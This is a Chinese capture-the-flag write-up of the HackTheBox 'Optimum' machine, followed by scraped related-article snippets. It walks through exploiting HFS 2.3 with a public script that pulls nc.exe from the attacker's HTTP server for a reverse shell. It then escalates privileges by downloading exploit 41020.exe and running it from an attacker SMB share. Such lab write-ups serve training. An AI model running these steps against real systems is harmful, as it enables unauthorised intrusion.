hackthebox-optimum(考点:hfs/windows)不用msf
用msf做很快。这台靶机很多人做以及写的writeup都是msf。但针对oscp备考者,本篇文章不用msf
1、nmap
就一个80,提示是HFS 2.3
2、 hfs漏洞利用
直接搜searchsploit hfs
用python比较方便,就选择39161.py
打开py看看,有几处要修改。IP端口当然要改成自己的。看样子这是个直接弹shell到本机的py。另外我还看到代码里有nc,而且还是从本机的http里使用 nc.exe。
思路就是用python打开 自己的http服务器python -m SimpleHTTPServer 80
,再把nc.exe放到服务器的路径里。你在哪个路径下打开,就把nc放到哪里。
按要求执行python 39161.py 10.10.10.8 80
看这脚本应该是多次调用,所以要多试几次
本机监听,收到shell
3、提权
接下来就是找提权漏洞了
可以先systeminfo查看系统版本信息,再用常用的这个工具
python windows-exploit-suggester.py --systeminfo info.txt --database 2020-04-08-mssb.xls
有挺多的,我试了几个都不行,浪费时间。。。。
最后这个行得通。
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
因为是Windows,所以习惯用smbserver 此处下载 的服务传送&执行,很方便。以前的文章里写过很多操作的方法了。
把41020.exe放到我本机的共享文件夹里。路径自己定。开启
python smbserver.py Share '/root/exp'
在shell里直接执行
\\10.10.14.57\share\41020.exe
直接搞定。。
hackthebox-optimum(考点:hfs/windows)不用msf相关推荐
- Windows不用虚拟机或双系统,轻松实现linux shell环境:gitforwindows
windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...
- 服务器windows模拟linux环境,科学网—Windows不用虚拟机或双系统,轻松实现shell环境:gitforwindows - 刘永鑫的博文...
windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...
- vulnhub-Brainpan (考点:windows exe和linux elf下的两种缓冲区溢出)
这个靶机前面考exe文件的缓冲区溢出,后面的提权方法还有对linux-elf文件的缓冲区溢出.可以熟悉ollydbg &immunitydebugger & gdb 几个常用调试工具和 ...
- HackTheBox::Optimum
0x00信息收集 nmap -Pn -sV 10.10.10.8 查看80端口的服务,得到使用的服务为HFS,且版本信息为2.3 通过expliot-db找到可利用的漏洞点 0x00 漏洞利用 下载相 ...
- Linux 隐藏Windows,如何在windows不用软件隐藏重要文件
每个人电脑里面都有些秘密,但是别人需要使用你的电脑时,有可能会看到,但是我们又不想让别人发现时,我们可以将其隐藏,那么别人就不会看到了.360文件保险柜.腾讯电脑管家等等.使用软件繁琐软件过大还会拖慢 ...
- 专升本-计算机公共课考点(2)——Windows 7 操作系统
专升本-计算机公共课考点分析 Windows 7 操作系统 26. 操作系统的概念 27. 操作系统的功能 28. 操作系统的主要特征 29. 操作系统的分类 30. 常用操作系统简介 31. Win ...
- 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...
- 网络安全-木马入侵windows -msfvenom反弹shell(CMD)
网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...
- windows API 串口编程参考
*************************************************** 更多精彩,欢迎进入:http://shop115376623.taobao.com ****** ...
最新文章
- BZOJ 1096: [ZJOI2007]仓库建设
- RuntimeError: Found dtype Double but expected Float”
- pytorch 测试 darknet
- extends thread java_java学习之- 线程继承Thread类
- c 怎么连接mysql博客_C连接MySql数据库
- sap idoc techniques
- i++与++i的区别,使用实例说明
- linux 硬盘空间监控,Linux服务器硬盘空间监控
- 恒大和小米双双否认外界谣言,此前有人宣称小米将接手恒大造车
- 如何配置VS使得可以通过域名或IP访问
- java计算机毕业设计小区宠物管理系统源码+系统+数据库+lw文档
- 使用Colab对wget下载加速
- ALFA机器视觉深度学习外观检测软件——无需算法编程的机器视觉检测软件
- iphone8进入恢复模式或DFU模式
- hive 学习系列五(hive 和elasticsearch 的交互,很详细哦,我又来吹liubi了)
- 回到那个夏天(千与千寻)
- 物联网毕业设计题目大全
- 计算机硬件系统一直延用,会计从业考试:会计电算化计算机硬件系统
- android 应用程序Activity管理类
- 全相位算法c语言表达,基于DSP的全相位FFT频率计设计.pdf